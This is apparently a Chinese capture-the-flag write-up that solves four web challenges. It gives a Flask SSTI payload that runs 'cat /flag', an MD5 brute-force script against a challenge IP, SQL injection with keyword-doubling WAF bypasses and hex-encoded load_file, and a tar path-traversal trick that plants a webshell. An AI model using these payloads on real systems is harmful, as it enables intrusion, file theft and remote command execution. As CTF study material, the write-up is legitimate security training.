跟在Decade后面复现的,大佬稳
checkInGame
注释updateTime
easyWeb
字符规范器,还挺好玩的,过滤掉了Flask SSTI常见的字符,用Unicode字符绕过
{ | { |
} | } |
[ | [ |
] | ] |
' | ' |
" | " |
{{url_for.__globals__['__builtins__']['eval']('__import__("os").popen("cat /flag").read()')}}
抄点payload:
https://10-0-0-55.github.io/web/flask/ssti/
这个payload不能使,有点蛋疼,看来有时候要多试几个。
{{''.class.mro()[1].subclasses()}}
ezMd5
存在auth.so文件
Php::Parameters *__fastcall auth(Php::Parameters *a1, __int64 a2)
{
__int64 v2; // rax
__int64 v3; // rax
char v5; // [rsp+10h] [rbp-60h]
char v6[8]; // [rsp+30h] [rbp-40h]
unsigned __int64 v7; // [rsp+58h] [rbp-18h]
v7 = __readfsqword(0x28u);
strcpy(v6, "21232f297a57a5a743894a0e4a801fc3");
v2 = std::vector<Php::Value,std::allocator<Php::Value>>::operator[](a2, 1LL);
v3 = Php::Value::operator char const*(v2);
strcpy(&v5, v3);
Php::Value::Value(a1, v6, -1);
return a1;
}
大概考点是栈溢出,MD5还真的挺好绕过的
看不懂,直接爆破
import requests
url = "http://122.112.253.121:10032/"
for i in range(50):
password = 'a' * i + 'QNKCDZO'
payload = {'name': 's878926199a', 'password': password}
files = []
headers = {
'X-Forwarded-For': ''
}
response = requests.request("POST", url, headers=headers, data=payload, files=files)
if response.text.find('flag{') != -1:
print(payload)
print(response.text.encode('utf8'))
CrossFire
先试了试蚁剑发现连不上,想想也不会这么简单
这里的id存在SQL注入,黑盒存在关键字转空字符串WAF,以及字符串过滤,使用十六进制读取文件:
-1' ununionion selselectect load_file(0x2f7661722f7777772f68746d6c2f696e6465782e706870)%23
index.php:
<?php
error_reporting(0);
session_start();
include('config.php');
$upload = 'upload/'.md5("shuyu".$_SERVER['REMOTE_ADDR']);
@mkdir($upload);
file_put_contents($upload.'/index.html', '');
if(isset($_POST['submit'])){
$allow_type=array("jpg","gif","png","bmp","tar","zip");
$fileext = substr(strrchr($_FILES['file']['name'], '.'), 1);
if ($_FILES["file"]["error"] > 0 && !in_array($fileext,$type) && $_FILES["file"]["size"] > 204800){
die('upload error');
}else{
$filename=addslashes($_FILES['file']['name']);
$sql="insert into img (filename) values ('$filename')";
$conn->query($sql);
$sql="select id from img where filename='$filename'";
$result=$conn->query($sql);
if ($result->num_rows > 0) {
while($row = $result->fetch_assoc()) {
$id=$row["id"];
}
move_uploaded_file($_FILES["file"]["tmp_name"],$upload.'/'.$filename);
header("Location: index.php?id=$id");
}
}
}
elseif (isset($_GET['id'])){
$id=addslashes($_GET['id']);
$sql="select filename from img where id=$id";
$result=$conn->query($sql);
if ($result->num_rows > 0) {
while($row = $result->fetch_assoc()) {
$filename=$row["filename"];
}
$img=$upload.'/'.$filename;
echo "<img src='$img'/>";
}
}
elseif (isset($_POST['submit1'])){
$allow_type=array("jpg","gif","png","bmp","tar","zip");
$fileext = substr(strrchr($_FILES['file']['name'], '.'), 1);
if ($_FILES["file"]["error"] > 0 && !in_array($fileext,$type) && $_FILES["file"]["size"] > 204800){
die('upload error');
}else{
$filename=addslashes($_FILES['file']['name']);
move_uploaded_file($_FILES["file"]["tmp_name"],$upload.'/'.$filename);
@exec("cd /tmp&&python3 /tar.py ".escapeshellarg('/var/www/html/'.$upload.'/'.$filename));
}
}
?>
存在tar.py文件,读取改文件:
-1' ununionion selselectect load_file(0x2f7461722e7079)%23
源码
import sys
tar = tarfile.open(sys.argv[1], "r")
tar.extractall()
写的是有关tar文件解压过程
tar cvf exp22.tar ../../../var/www/html/upload/shell.php -P
压缩一个文件
最后上传,然后解压,最后在upload/shell.php里面getshell,执行readflag